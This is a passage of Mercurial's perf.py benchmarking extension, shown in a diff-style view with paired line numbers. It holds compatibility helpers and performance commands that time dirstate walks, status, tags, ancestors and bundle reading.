82 # for "historical portability":
92 # for "historical portability":
83 # define util.timer forcibly, because util.timer has been available
93 # define util.timer forcibly, because util.timer has been available
84 # since ae5d60bb70c9
94 # since ae5d60bb70c9
85 if safehasattr(time, 'perf_counter'):
95 if safehasattr(time, 'perf_counter'):
86 util.timer = time.perf_counter
96 util.timer = time.perf_counter
87 elif os.name == 'nt':
97 elif os.name == 'nt':
88 util.timer = time.clock
98 util.timer = time.clock
89 else:
99 else:
90 util.timer = time.time
100 util.timer = time.time
91
101
92 # for "historical portability":
102 # for "historical portability":
93 # use locally defined empty option list, if formatteropts isn't
103 # use locally defined empty option list, if formatteropts isn't
94 # available, because commands.formatteropts has been available since
104 # available, because commands.formatteropts has been available since
95 # 3.2 (or 7a7eed5176a4), even though formatting itself has been
105 # 3.2 (or 7a7eed5176a4), even though formatting itself has been
96 # available since 2.2 (or ae5f92e154d3)
106 # available since 2.2 (or ae5f92e154d3)
97 formatteropts = getattr(cmdutil, "formatteropts",
107 formatteropts = getattr(cmdutil, "formatteropts",
98 getattr(commands, "formatteropts", []))
108 getattr(commands, "formatteropts", []))
99
109
100 # for "historical portability":
110 # for "historical portability":
101 # use locally defined option list, if debugrevlogopts isn't available,
111 # use locally defined option list, if debugrevlogopts isn't available,
102 # because commands.debugrevlogopts has been available since 3.7 (or
112 # because commands.debugrevlogopts has been available since 3.7 (or
103 # 5606f7d0d063), even though cmdutil.openrevlog() has been available
113 # 5606f7d0d063), even though cmdutil.openrevlog() has been available
104 # since 1.9 (or a79fea6b3e77).
114 # since 1.9 (or a79fea6b3e77).
105 revlogopts = getattr(cmdutil, "debugrevlogopts",
115 revlogopts = getattr(cmdutil, "debugrevlogopts",
106 getattr(commands, "debugrevlogopts", [
116 getattr(commands, "debugrevlogopts", [
107 ('c', 'changelog', False, ('open changelog')),
117 ('c', 'changelog', False, ('open changelog')),
108 ('m', 'manifest', False, ('open manifest')),
118 ('m', 'manifest', False, ('open manifest')),
109 ('', 'dir', False, ('open directory manifest')),
119 ('', 'dir', False, ('open directory manifest')),
110 ]))
120 ]))
111
121
112 cmdtable = {}
122 cmdtable = {}
113
123
114 # for "historical portability":
124 # for "historical portability":
115 # define parsealiases locally, because cmdutil.parsealiases has been
125 # define parsealiases locally, because cmdutil.parsealiases has been
116 # available since 1.5 (or 6252852b4332)
126 # available since 1.5 (or 6252852b4332)
117 def parsealiases(cmd):
127 def parsealiases(cmd):
118 return cmd.lstrip("^").split("|")
128 return cmd.lstrip("^").split("|")
119
129
120 if safehasattr(registrar, 'command'):
130 if safehasattr(registrar, 'command'):
121 command = registrar.command(cmdtable)
131 command = registrar.command(cmdtable)
122 elif safehasattr(cmdutil, 'command'):
132 elif safehasattr(cmdutil, 'command'):
123 command = cmdutil.command(cmdtable)
133 command = cmdutil.command(cmdtable)
124 if 'norepo' not in getargspec(command).args:
134 if 'norepo' not in getargspec(command).args:
125 # for "historical portability":
135 # for "historical portability":
126 # wrap original cmdutil.command, because "norepo" option has
136 # wrap original cmdutil.command, because "norepo" option has
127 # been available since 3.1 (or 75a96326cecb)
137 # been available since 3.1 (or 75a96326cecb)
128 _command = command
138 _command = command
129 def command(name, options=(), synopsis=None, norepo=False):
139 def command(name, options=(), synopsis=None, norepo=False):
130 if norepo:
140 if norepo:
131 commands.norepo += ' %s' % ' '.join(parsealiases(name))
141 commands.norepo += ' %s' % ' '.join(parsealiases(name))
132 return _command(name, list(options), synopsis)
142 return _command(name, list(options), synopsis)
133 else:
143 else:
134 # for "historical portability":
144 # for "historical portability":
135 # define "@command" annotation locally, because cmdutil.command
145 # define "@command" annotation locally, because cmdutil.command
136 # has been available since 1.9 (or 2daa5179e73f)
146 # has been available since 1.9 (or 2daa5179e73f)
137 def command(name, options=(), synopsis=None, norepo=False):
147 def command(name, options=(), synopsis=None, norepo=False):
138 def decorator(func):
148 def decorator(func):
139 if synopsis:
149 if synopsis:
140 cmdtable[name] = func, list(options), synopsis
150 cmdtable[name] = func, list(options), synopsis
141 else:
151 else:
142 cmdtable[name] = func, list(options)
152 cmdtable[name] = func, list(options)
143 if norepo:
153 if norepo:
144 commands.norepo += ' %s' % ' '.join(parsealiases(name))
154 commands.norepo += ' %s' % ' '.join(parsealiases(name))
145 return func
155 return func
146 return decorator
156 return decorator
147
157
148 try:
158 try:
149 import mercurial.registrar
159 import mercurial.registrar
150 import mercurial.configitems
160 import mercurial.configitems
151 configtable = {}
161 configtable = {}
152 configitem = mercurial.registrar.configitem(configtable)
162 configitem = mercurial.registrar.configitem(configtable)
153 configitem('perf', 'presleep',
163 configitem('perf', 'presleep',
154 default=mercurial.configitems.dynamicdefault,
164 default=mercurial.configitems.dynamicdefault,
155 )
165 )
156 configitem('perf', 'stub',
166 configitem('perf', 'stub',
157 default=mercurial.configitems.dynamicdefault,
167 default=mercurial.configitems.dynamicdefault,
158 )
168 )
159 configitem('perf', 'parentscount',
169 configitem('perf', 'parentscount',
160 default=mercurial.configitems.dynamicdefault,
170 default=mercurial.configitems.dynamicdefault,
161 )
171 )
162 except (ImportError, AttributeError):
172 except (ImportError, AttributeError):
163 pass
173 pass
164
174
165 def getlen(ui):
175 def getlen(ui):
166 if ui.configbool("perf", "stub", False):
176 if ui.configbool("perf", "stub", False):
167 return lambda x: 1
177 return lambda x: 1
168 return len
178 return len
169
179
170 def gettimer(ui, opts=None):
180 def gettimer(ui, opts=None):
171 """return a timer function and formatter: (timer, formatter)
181 """return a timer function and formatter: (timer, formatter)
172
182
173 This function exists to gather the creation of formatter in a single
183 This function exists to gather the creation of formatter in a single
174 place instead of duplicating it in all performance commands."""
184 place instead of duplicating it in all performance commands."""
175
185
176 # enforce an idle period before execution to counteract power management
186 # enforce an idle period before execution to counteract power management
177 # experimental config: perf.presleep
187 # experimental config: perf.presleep
178 time.sleep(getint(ui, "perf", "presleep", 1))
188 time.sleep(getint(ui, "perf", "presleep", 1))
179
189
180 if opts is None:
190 if opts is None:
181 opts = {}
191 opts = {}
182 # redirect all to stderr unless buffer api is in use
192 # redirect all to stderr unless buffer api is in use
183 if not ui._buffers:
193 if not ui._buffers:
184 ui = ui.copy()
194 ui = ui.copy()
185 uifout = safeattrsetter(ui, 'fout', ignoremissing=True)
195 uifout = safeattrsetter(ui, 'fout', ignoremissing=True)
186 if uifout:
196 if uifout:
187 # for "historical portability":
197 # for "historical portability":
188 # ui.fout/ferr have been available since 1.9 (or 4e1ccd4c2b6d)
198 # ui.fout/ferr have been available since 1.9 (or 4e1ccd4c2b6d)
189 uifout.set(ui.ferr)
199 uifout.set(ui.ferr)
190
200
191 # get a formatter
201 # get a formatter
192 uiformatter = getattr(ui, 'formatter', None)
202 uiformatter = getattr(ui, 'formatter', None)
193 if uiformatter:
203 if uiformatter:
194 fm = uiformatter('perf', opts)
204 fm = uiformatter('perf', opts)
195 else:
205 else:
196 # for "historical portability":
206 # for "historical portability":
197 # define formatter locally, because ui.formatter has been
207 # define formatter locally, because ui.formatter has been
198 # available since 2.2 (or ae5f92e154d3)
208 # available since 2.2 (or ae5f92e154d3)
199 from mercurial import node
209 from mercurial import node
200 class defaultformatter(object):
210 class defaultformatter(object):
201 """Minimized composition of baseformatter and plainformatter
211 """Minimized composition of baseformatter and plainformatter
202 """
212 """
203 def __init__(self, ui, topic, opts):
213 def __init__(self, ui, topic, opts):
204 self._ui = ui
214 self._ui = ui
205 if ui.debugflag:
215 if ui.debugflag:
206 self.hexfunc = node.hex
216 self.hexfunc = node.hex
207 else:
217 else:
208 self.hexfunc = node.short
218 self.hexfunc = node.short
209 def __nonzero__(self):
219 def __nonzero__(self):
210 return False
220 return False
211 __bool__ = __nonzero__
221 __bool__ = __nonzero__
212 def startitem(self):
222 def startitem(self):
213 pass
223 pass
214 def data(self, **data):
224 def data(self, **data):
215 pass
225 pass
216 def write(self, fields, deftext, *fielddata, **opts):
226 def write(self, fields, deftext, *fielddata, **opts):
217 self._ui.write(deftext % fielddata, **opts)
227 self._ui.write(deftext % fielddata, **opts)
218 def condwrite(self, cond, fields, deftext, *fielddata, **opts):
228 def condwrite(self, cond, fields, deftext, *fielddata, **opts):
219 if cond:
229 if cond:
220 self._ui.write(deftext % fielddata, **opts)
230 self._ui.write(deftext % fielddata, **opts)
221 def plain(self, text, **opts):
231 def plain(self, text, **opts):
222 self._ui.write(text, **opts)
232 self._ui.write(text, **opts)
223 def end(self):
233 def end(self):
224 pass
234 pass
225 fm = defaultformatter(ui, 'perf', opts)
235 fm = defaultformatter(ui, 'perf', opts)
226
236
227 # stub function, runs code only once instead of in a loop
237 # stub function, runs code only once instead of in a loop
228 # experimental config: perf.stub
238 # experimental config: perf.stub
229 if ui.configbool("perf", "stub", False):
239 if ui.configbool("perf", "stub", False):
230 return functools.partial(stub_timer, fm), fm
240 return functools.partial(stub_timer, fm), fm
231 return functools.partial(_timer, fm), fm
241 return functools.partial(_timer, fm), fm
232
242
233 def stub_timer(fm, func, title=None):
243 def stub_timer(fm, func, title=None):
234 func()
244 func()
235
245
236 def _timer(fm, func, title=None):
246 def _timer(fm, func, title=None):
237 gc.collect()
247 gc.collect()
238 results = []
248 results = []
239 begin = util.timer()
249 begin = util.timer()
240 count = 0
250 count = 0
241 while True:
251 while True:
242 ostart = os.times()
252 ostart = os.times()
243 cstart = util.timer()
253 cstart = util.timer()
244 r = func()
254 r = func()
245 cstop = util.timer()
255 cstop = util.timer()
246 ostop = os.times()
256 ostop = os.times()
247 count += 1
257 count += 1
248 a, b = ostart, ostop
258 a, b = ostart, ostop
249 results.append((cstop - cstart, b[0] - a[0], b[1]-a[1]))
259 results.append((cstop - cstart, b[0] - a[0], b[1]-a[1]))
250 if cstop - begin > 3 and count >= 100:
260 if cstop - begin > 3 and count >= 100:
251 break
261 break
252 if cstop - begin > 10 and count >= 3:
262 if cstop - begin > 10 and count >= 3:
253 break
263 break
254
264
255 fm.startitem()
265 fm.startitem()
256
266
257 if title:
267 if title:
258 fm.write('title', '! %s\n', title)
268 fm.write('title', '! %s\n', title)
259 if r:
269 if r:
260 fm.write('result', '! result: %s\n', r)
270 fm.write('result', '! result: %s\n', r)
261 m = min(results)
271 m = min(results)
262 fm.plain('!')
272 fm.plain('!')
263 fm.write('wall', ' wall %f', m[0])
273 fm.write('wall', ' wall %f', m[0])
264 fm.write('comb', ' comb %f', m[1] + m[2])
274 fm.write('comb', ' comb %f', m[1] + m[2])
265 fm.write('user', ' user %f', m[1])
275 fm.write('user', ' user %f', m[1])
266 fm.write('sys', ' sys %f', m[2])
276 fm.write('sys', ' sys %f', m[2])
267 fm.write('count', ' (best of %d)', count)
277 fm.write('count', ' (best of %d)', count)
268 fm.plain('\n')
278 fm.plain('\n')
269
279
270 # utilities for historical portability
280 # utilities for historical portability
271
281
272 def getint(ui, section, name, default):
282 def getint(ui, section, name, default):
273 # for "historical portability":
283 # for "historical portability":
274 # ui.configint has been available since 1.9 (or fa2b596db182)
284 # ui.configint has been available since 1.9 (or fa2b596db182)
275 v = ui.config(section, name, None)
285 v = ui.config(section, name, None)
276 if v is None:
286 if v is None:
277 return default
287 return default
278 try:
288 try:
279 return int(v)
289 return int(v)
280 except ValueError:
290 except ValueError:
281 raise error.ConfigError(("%s.%s is not an integer ('%s')")
291 raise error.ConfigError(("%s.%s is not an integer ('%s')")
282 % (section, name, v))
292 % (section, name, v))
283
293
284 def safeattrsetter(obj, name, ignoremissing=False):
294 def safeattrsetter(obj, name, ignoremissing=False):
285 """Ensure that 'obj' has 'name' attribute before subsequent setattr
295 """Ensure that 'obj' has 'name' attribute before subsequent setattr
286
296
287 This function is aborted, if 'obj' doesn't have 'name' attribute
297 This function is aborted, if 'obj' doesn't have 'name' attribute
288 at runtime. This avoids overlooking removal of an attribute, which
298 at runtime. This avoids overlooking removal of an attribute, which
289 breaks assumption of performance measurement, in the future.
299 breaks assumption of performance measurement, in the future.
290
300
291 This function returns the object to (1) assign a new value, and
301 This function returns the object to (1) assign a new value, and
292 (2) restore an original value to the attribute.
302 (2) restore an original value to the attribute.
293
303
294 If 'ignoremissing' is true, missing 'name' attribute doesn't cause
304 If 'ignoremissing' is true, missing 'name' attribute doesn't cause
295 abortion, and this function returns None. This is useful to
305 abortion, and this function returns None. This is useful to
296 examine an attribute, which isn't ensured in all Mercurial
306 examine an attribute, which isn't ensured in all Mercurial
297 versions.
307 versions.
298 """
308 """
299 if not util.safehasattr(obj, name):
309 if not util.safehasattr(obj, name):
300 if ignoremissing:
310 if ignoremissing:
301 return None
311 return None
302 raise error.Abort(("missing attribute %s of %s might break assumption"
312 raise error.Abort(("missing attribute %s of %s might break assumption"
303 " of performance measurement") % (name, obj))
313 " of performance measurement") % (name, obj))
304
314
305 origvalue = getattr(obj, name)
315 origvalue = getattr(obj, name)
306 class attrutil(object):
316 class attrutil(object):
307 def set(self, newvalue):
317 def set(self, newvalue):
308 setattr(obj, name, newvalue)
318 setattr(obj, name, newvalue)
309 def restore(self):
319 def restore(self):
310 setattr(obj, name, origvalue)
320 setattr(obj, name, origvalue)
311
321
312 return attrutil()
322 return attrutil()
313
323
314 # utilities to examine each internal API changes
324 # utilities to examine each internal API changes
315
325
316 def getbranchmapsubsettable():
326 def getbranchmapsubsettable():
317 # for "historical portability":
327 # for "historical portability":
318 # subsettable is defined in:
328 # subsettable is defined in:
319 # - branchmap since 2.9 (or 175c6fd8cacc)
329 # - branchmap since 2.9 (or 175c6fd8cacc)
320 # - repoview since 2.5 (or 59a9f18d4587)
330 # - repoview since 2.5 (or 59a9f18d4587)
321 for mod in (branchmap, repoview):
331 for mod in (branchmap, repoview):
322 subsettable = getattr(mod, 'subsettable', None)
332 subsettable = getattr(mod, 'subsettable', None)
323 if subsettable:
333 if subsettable:
324 return subsettable
334 return subsettable
325
335
326 # bisecting in bcee63733aad::59a9f18d4587 can reach here (both
336 # bisecting in bcee63733aad::59a9f18d4587 can reach here (both
327 # branchmap and repoview modules exist, but subsettable attribute
337 # branchmap and repoview modules exist, but subsettable attribute
328 # doesn't)
338 # doesn't)
329 raise error.Abort(("perfbranchmap not available with this Mercurial"),
339 raise error.Abort(("perfbranchmap not available with this Mercurial"),
330 hint="use 2.5 or later")
340 hint="use 2.5 or later")
331
341
332 def getsvfs(repo):
342 def getsvfs(repo):
333 """Return appropriate object to access files under .hg/store
343 """Return appropriate object to access files under .hg/store
334 """
344 """
335 # for "historical portability":
345 # for "historical portability":
336 # repo.svfs has been available since 2.3 (or 7034365089bf)
346 # repo.svfs has been available since 2.3 (or 7034365089bf)
337 svfs = getattr(repo, 'svfs', None)
347 svfs = getattr(repo, 'svfs', None)
338 if svfs:
348 if svfs:
339 return svfs
349 return svfs
340 else:
350 else:
341 return getattr(repo, 'sopener')
351 return getattr(repo, 'sopener')
342
352
343 def getvfs(repo):
353 def getvfs(repo):
344 """Return appropriate object to access files under .hg
354 """Return appropriate object to access files under .hg
345 """
355 """
346 # for "historical portability":
356 # for "historical portability":
347 # repo.vfs has been available since 2.3 (or 7034365089bf)
357 # repo.vfs has been available since 2.3 (or 7034365089bf)
348 vfs = getattr(repo, 'vfs', None)
358 vfs = getattr(repo, 'vfs', None)
349 if vfs:
359 if vfs:
350 return vfs
360 return vfs
351 else:
361 else:
352 return getattr(repo, 'opener')
362 return getattr(repo, 'opener')
353
363
354 def repocleartagscachefunc(repo):
364 def repocleartagscachefunc(repo):
355 """Return the function to clear tags cache according to repo internal API
365 """Return the function to clear tags cache according to repo internal API
356 """
366 """
357 if util.safehasattr(repo, '_tagscache'): # since 2.0 (or 9dca7653b525)
367 if util.safehasattr(repo, '_tagscache'): # since 2.0 (or 9dca7653b525)
358 # in this case, setattr(repo, '_tagscache', None) or so isn't
368 # in this case, setattr(repo, '_tagscache', None) or so isn't
359 # correct way to clear tags cache, because existing code paths
369 # correct way to clear tags cache, because existing code paths
360 # expect _tagscache to be a structured object.
370 # expect _tagscache to be a structured object.
361 def clearcache():
371 def clearcache():
362 # _tagscache has been filteredpropertycache since 2.5 (or
372 # _tagscache has been filteredpropertycache since 2.5 (or
363 # 98c867ac1330), and delattr() can't work in such case
373 # 98c867ac1330), and delattr() can't work in such case
364 if '_tagscache' in vars(repo):
374 if '_tagscache' in vars(repo):
365 del repo.__dict__['_tagscache']
375 del repo.__dict__['_tagscache']
366 return clearcache
376 return clearcache
367
377
368 repotags = safeattrsetter(repo, '_tags', ignoremissing=True)
378 repotags = safeattrsetter(repo, '_tags', ignoremissing=True)
369 if repotags: # since 1.4 (or 5614a628d173)
379 if repotags: # since 1.4 (or 5614a628d173)
370 return lambda : repotags.set(None)
380 return lambda : repotags.set(None)
371
381
372 repotagscache = safeattrsetter(repo, 'tagscache', ignoremissing=True)
382 repotagscache = safeattrsetter(repo, 'tagscache', ignoremissing=True)
373 if repotagscache: # since 0.6 (or d7df759d0e97)
383 if repotagscache: # since 0.6 (or d7df759d0e97)
374 return lambda : repotagscache.set(None)
384 return lambda : repotagscache.set(None)
375
385
376 # Mercurial earlier than 0.6 (or d7df759d0e97) logically reaches
386 # Mercurial earlier than 0.6 (or d7df759d0e97) logically reaches
377 # this point, but it isn't so problematic, because:
387 # this point, but it isn't so problematic, because:
378 # - repo.tags of such Mercurial isn't "callable", and repo.tags()
388 # - repo.tags of such Mercurial isn't "callable", and repo.tags()
379 # in perftags() causes failure soon
389 # in perftags() causes failure soon
380 # - perf.py itself has been available since 1.1 (or eb240755386d)
390 # - perf.py itself has been available since 1.1 (or eb240755386d)
381 raise error.Abort(("tags API of this hg command is unknown"))
391 raise error.Abort(("tags API of this hg command is unknown"))
382
392
383 # utilities to clear cache
393 # utilities to clear cache
384
394
385 def clearfilecache(repo, attrname):
395 def clearfilecache(repo, attrname):
386 unfi = repo.unfiltered()
396 unfi = repo.unfiltered()
387 if attrname in vars(unfi):
397 if attrname in vars(unfi):
388 delattr(unfi, attrname)
398 delattr(unfi, attrname)
389 unfi._filecache.pop(attrname, None)
399 unfi._filecache.pop(attrname, None)
390
400
391 # perf commands
401 # perf commands
392
402
393 @command('perfwalk', formatteropts)
403 @command('perfwalk', formatteropts)
394 def perfwalk(ui, repo, *pats, **opts):
404 def perfwalk(ui, repo, *pats, **opts):
395 timer, fm = gettimer(ui, opts)
405 timer, fm = gettimer(ui, opts)
396 m = scmutil.match(repo[None], pats, {})
406 m = scmutil.match(repo[None], pats, {})
397 timer(lambda: len(list(repo.dirstate.walk(m, subrepos=[], unknown=True,
407 timer(lambda: len(list(repo.dirstate.walk(m, subrepos=[], unknown=True,
398 ignored=False))))
408 ignored=False))))
399 fm.end()
409 fm.end()
400
410
401 @command('perfannotate', formatteropts)
411 @command('perfannotate', formatteropts)
402 def perfannotate(ui, repo, f, **opts):
412 def perfannotate(ui, repo, f, **opts):
403 timer, fm = gettimer(ui, opts)
413 timer, fm = gettimer(ui, opts)
404 fc = repo['.'][f]
414 fc = repo['.'][f]
405 timer(lambda: len(fc.annotate(True)))
415 timer(lambda: len(fc.annotate(True)))
406 fm.end()
416 fm.end()
407
417
408 @command('perfstatus',
418 @command('perfstatus',
409 [('u', 'unknown', False,
419 [('u', 'unknown', False,
410 'ask status to look for unknown files')] + formatteropts)
420 'ask status to look for unknown files')] + formatteropts)
411 def perfstatus(ui, repo, **opts):
421 def perfstatus(ui, repo, **opts):
412 #m = match.always(repo.root, repo.getcwd())
422 #m = match.always(repo.root, repo.getcwd())
413 #timer(lambda: sum(map(len, repo.dirstate.status(m, [], False, False,
423 #timer(lambda: sum(map(len, repo.dirstate.status(m, [], False, False,
414 # False))))
424 # False))))
415 timer, fm = gettimer(ui, opts)
425 timer, fm = gettimer(ui, opts)
416 timer(lambda: sum(map(len, repo.status(unknown=opts['unknown']))))
426 timer(lambda: sum(map(len, repo.status(unknown=opts['unknown']))))
417 fm.end()
427 fm.end()
418
428
419 @command('perfaddremove', formatteropts)
429 @command('perfaddremove', formatteropts)
420 def perfaddremove(ui, repo, **opts):
430 def perfaddremove(ui, repo, **opts):
421 timer, fm = gettimer(ui, opts)
431 timer, fm = gettimer(ui, opts)
422 try:
432 try:
423 oldquiet = repo.ui.quiet
433 oldquiet = repo.ui.quiet
424 repo.ui.quiet = True
434 repo.ui.quiet = True
425 matcher = scmutil.match(repo[None])
435 matcher = scmutil.match(repo[None])
426 opts['dry_run'] = True
436 opts['dry_run'] = True
427 timer(lambda: scmutil.addremove(repo, matcher, "", opts))
437 timer(lambda: scmutil.addremove(repo, matcher, "", opts))
428 finally:
438 finally:
429 repo.ui.quiet = oldquiet
439 repo.ui.quiet = oldquiet
430 fm.end()
440 fm.end()
431
441
432 def clearcaches(cl):
442 def clearcaches(cl):
433 # behave somewhat consistently across internal API changes
443 # behave somewhat consistently across internal API changes
434 if util.safehasattr(cl, 'clearcaches'):
444 if util.safehasattr(cl, 'clearcaches'):
435 cl.clearcaches()
445 cl.clearcaches()
436 elif util.safehasattr(cl, '_nodecache'):
446 elif util.safehasattr(cl, '_nodecache'):
437 from mercurial.node import nullid, nullrev
447 from mercurial.node import nullid, nullrev
438 cl._nodecache = {nullid: nullrev}
448 cl._nodecache = {nullid: nullrev}
439 cl._nodepos = None
449 cl._nodepos = None
440
450
441 @command('perfheads', formatteropts)
451 @command('perfheads', formatteropts)
442 def perfheads(ui, repo, **opts):
452 def perfheads(ui, repo, **opts):
443 timer, fm = gettimer(ui, opts)
453 timer, fm = gettimer(ui, opts)
444 cl = repo.changelog
454 cl = repo.changelog
445 def d():
455 def d():
446 len(cl.headrevs())
456 len(cl.headrevs())
447 clearcaches(cl)
457 clearcaches(cl)
448 timer(d)
458 timer(d)
449 fm.end()
459 fm.end()
450
460
451 @command('perftags', formatteropts)
461 @command('perftags', formatteropts)
452 def perftags(ui, repo, **opts):
462 def perftags(ui, repo, **opts):
453 import mercurial.changelog
463 import mercurial.changelog
454 import mercurial.manifest
464 import mercurial.manifest
455 timer, fm = gettimer(ui, opts)
465 timer, fm = gettimer(ui, opts)
456 svfs = getsvfs(repo)
466 svfs = getsvfs(repo)
457 repocleartagscache = repocleartagscachefunc(repo)
467 repocleartagscache = repocleartagscachefunc(repo)
458 def t():
468 def t():
459 repo.changelog = mercurial.changelog.changelog(svfs)
469 repo.changelog = mercurial.changelog.changelog(svfs)
460 repo.manifestlog = mercurial.manifest.manifestlog(svfs, repo)
470 repo.manifestlog = mercurial.manifest.manifestlog(svfs, repo)
461 repocleartagscache()
471 repocleartagscache()
462 return len(repo.tags())
472 return len(repo.tags())
463 timer(t)
473 timer(t)
464 fm.end()
474 fm.end()
465
475
466 @command('perfancestors', formatteropts)
476 @command('perfancestors', formatteropts)
467 def perfancestors(ui, repo, **opts):
477 def perfancestors(ui, repo, **opts):
468 timer, fm = gettimer(ui, opts)
478 timer, fm = gettimer(ui, opts)
469 heads = repo.changelog.headrevs()
479 heads = repo.changelog.headrevs()
470 def d():
480 def d():
471 for a in repo.changelog.ancestors(heads):
481 for a in repo.changelog.ancestors(heads):
472 pass
482 pass
473 timer(d)
483 timer(d)
474 fm.end()
484 fm.end()
475
485
476 @command('perfancestorset', formatteropts)
486 @command('perfancestorset', formatteropts)
477 def perfancestorset(ui, repo, revset, **opts):
487 def perfancestorset(ui, repo, revset, **opts):
478 timer, fm = gettimer(ui, opts)
488 timer, fm = gettimer(ui, opts)
479 revs = repo.revs(revset)
489 revs = repo.revs(revset)
480 heads = repo.changelog.headrevs()
490 heads = repo.changelog.headrevs()
481 def d():
491 def d():
482 s = repo.changelog.ancestors(heads)
492 s = repo.changelog.ancestors(heads)
483 for rev in revs:
493 for rev in revs:
484 rev in s
494 rev in s
485 timer(d)
495 timer(d)
486 fm.end()
496 fm.end()
487
497
488 @command('perfbookmarks', formatteropts)
498 @command('perfbookmarks', formatteropts)
489 def perfbookmarks(ui, repo, **opts):
499 def perfbookmarks(ui, repo, **opts):
490 """benchmark parsing bookmarks from disk to memory"""
500 """benchmark parsing bookmarks from disk to memory"""
491 timer, fm = gettimer(ui, opts)
501 timer, fm = gettimer(ui, opts)
492 def d():
502 def d():
493 clearfilecache(repo, '_bookmarks')
503 clearfilecache(repo, '_bookmarks')
494 repo._bookmarks
504 repo._bookmarks
495 timer(d)
505 timer(d)
496 fm.end()
506 fm.end()
497
507
498 @command('perfbundleread', formatteropts, 'BUNDLE')
508 @command('perfbundleread', formatteropts, 'BUNDLE')
499 def perfbundleread(ui, repo, bundlepath, **opts):
509 def perfbundleread(ui, repo, bundlepath, **opts):
500 """Benchmark reading of bundle files.
510 """Benchmark reading of bundle files.
501
511
502 This command is meant to isolate the I/O part of bundle reading as
512 This command is meant to isolate the I/O part of bundle reading as
503 much as possible.
513 much as possible.
504 """
514 """
505 from mercurial import (
515 from mercurial import (
506 bundle2,
516 bundle2,
507 exchange,
517 exchange,
508 streamclone,
518 streamclone,
509 )
519 )
510
520
511 def makebench(fn):
521 def makebench(fn):
512 def run():
522 def run():
513 with open(bundlepath, 'rb') as fh:
523 with open(bundlepath, 'rb') as fh:
514 bundle = exchange.readbundle(ui, fh, bundlepath)
524 bundle = exchange.readbundle(ui, fh, bundlepath)
515 fn(bundle)
525 fn(bundle)
516
526
517 return run
527 return run
518
528
519 def makereadnbytes(size):
529 def makereadnbytes(size):
520 def run():
530 def run():
521 with open(bundlepath, 'rb') as fh:
531 with open(bundlepath, 'rb') as fh:
522 bundle = exchange.readbundle(ui, fh, bundlepath)
532 bundle = exchange.readbundle(ui, fh, bundlepath)
523 while bundle.read(size):
533 while bundle.read(size):
524 pass
534 pass
525
535
526 return run
536 return run
527
537
528 def makestdioread(size):
538 def makestdioread(size):
529 def run():
539 def run():
530 with open(bundlepath, 'rb') as fh:
540 with open(bundlepath, 'rb') as fh:
531 while fh.read(size):
541 while fh.read(size):
532 pass
542 pass
533
543
534 return run
544 return run
535
545
536 # bundle1
546 # bundle1
537
547
538 def deltaiter(bundle):
548 def deltaiter(bundle):
539 for delta in bundle.deltaiter():
549 for delta in bundle.deltaiter():
540 pass
550 pass
541
551
542 def iterchunks(bundle):
552 def iterchunks(bundle):
543 for chunk in bundle.getchunks():
553 for chunk in bundle.getchunks():
544 pass
554 pass
545
555
546 # bundle2
556 # bundle2
547
557
548 def forwardchunks(bundle):
558 def forwardchunks(bundle):
549 for chunk in bundle._forwardchunks():
559 for chunk in bundle._forwardchunks():
550 pass
560 pass
551
561
552 def iterparts(bundle):
562 def iterparts(bundle):
553 for part in bundle.iterparts():
563 for part in bundle.iterparts():
554 pass
564 pass
555
565
556 def iterpartsseekable(bundle):
566 def iterpartsseekable(bundle):
557 for part in bundle.iterparts(seekable=True):
567 for part in bundle.iterparts(seekable=True):
558 pass
568 pass
559
569
560 def seek(bundle):
570 def seek(bundle):
561 for part in bundle.iterparts(seekable=True):
571 for part in bundle.iterparts(seekable=True):
562 part.seek(0, os.SEEK_END)
572 part.seek(0, os.SEEK_END)
563
573
564 def makepartreadnbytes(size):
574 def makepartreadnbytes(size):
565 def run():
575 def run():
566 with open(bundlepath, 'rb') as fh:
576 with open(bundlepath, 'rb') as fh:
567 bundle = exchange.readbundle(ui, fh, bundlepath)
577 bundle = exchange.readbundle(ui, fh, bundlepath)
568 for part in bundle.iterparts():
578 for part in bundle.iterparts():
569 while part.read(size):
579 while part.read(size):
570 pass
580 pass
571
581
572 return run
582 return run
573
583
574 benches = [
584 benches = [
575 (makestdioread(8192), 'read(8k)'),
585 (makestdioread(8192), 'read(8k)'),
576 (makestdioread(16384), 'read(16k)'),
586 (makestdioread(16384), 'read(16k)'),
577 (makestdioread(32768), 'read(32k)'),
587 (makestdioread(32768), 'read(32k)'),
578 (makestdioread(131072), 'read(128k)'),
588 (makestdioread(131072), 'read(128k)'),
579 ]
589 ]
580
590
581 with open(bundlepath, 'rb') as fh:
591 with open(bundlepath, 'rb') as fh:
582 bundle = exchange.readbundle(ui, fh, bundlepath)
592 bundle = exchange.readbundle(ui, fh, bundlepath)
583
593
584 if isinstance(bundle, changegroup.cg1unpacker):
594 if isinstance(bundle, changegroup.cg1unpacker):
585 benches.extend([
595 benches.extend([
586 (makebench(deltaiter), 'cg1 deltaiter()'),
596 (makebench(deltaiter), 'cg1 deltaiter()'),
587 (makebench(iterchunks), 'cg1 getchunks()'),
597 (makebench(iterchunks), 'cg1 getchunks()'),
588 (makereadnbytes(8192), 'cg1 read(8k)'),
598 (makereadnbytes(8192), 'cg1 read(8k)'),
589 (makereadnbytes(16384), 'cg1 read(16k)'),
599 (makereadnbytes(16384), 'cg1 read(16k)'),
590 (makereadnbytes(32768), 'cg1 read(32k)'),
600 (makereadnbytes(32768), 'cg1 read(32k)'),
591 (makereadnbytes(131072), 'cg1 read(128k)'),
601 (makereadnbytes(131072), 'cg1 read(128k)'),
592 ])
602 ])
593 elif isinstance(bundle, bundle2.unbundle20):
603 elif isinstance(bundle, bundle2.unbundle20):
594 benches.extend([
604 benches.extend([
595 (makebench(forwardchunks), 'bundle2 forwardchunks()'),
605 (makebench(forwardchunks), 'bundle2 forwardchunks()'),
596 (makebench(iterparts), 'bundle2 iterparts()'),
606 (makebench(iterparts), 'bundle2 iterparts()'),
597 (makebench(iterpartsseekable), 'bundle2 iterparts() seekable'),
607 (makebench(iterpartsseekable), 'bundle2 iterparts() seekable'),
598 (makebench(seek), 'bundle2 part seek()'),
608 (makebench(seek), 'bundle2 part seek()'),
599 (makepartreadnbytes(8192), 'bundle2 part read(8k)'),
609 (makepartreadnbytes(8192), 'bundle2 part read(8k)'),
600 (makepartreadnbytes(16384), 'bundle2 part read(16k)'),
610 (makepartreadnbytes(16384), 'bundle2 part read(16k)'),
601 (makepartreadnbytes(32768), 'bundle2 part read(32k)'),
611 (makepartreadnbytes(32768), 'bundle2 part read(32k)'),
602 (makepartreadnbytes(131072), 'bundle2 part read(128k)'),
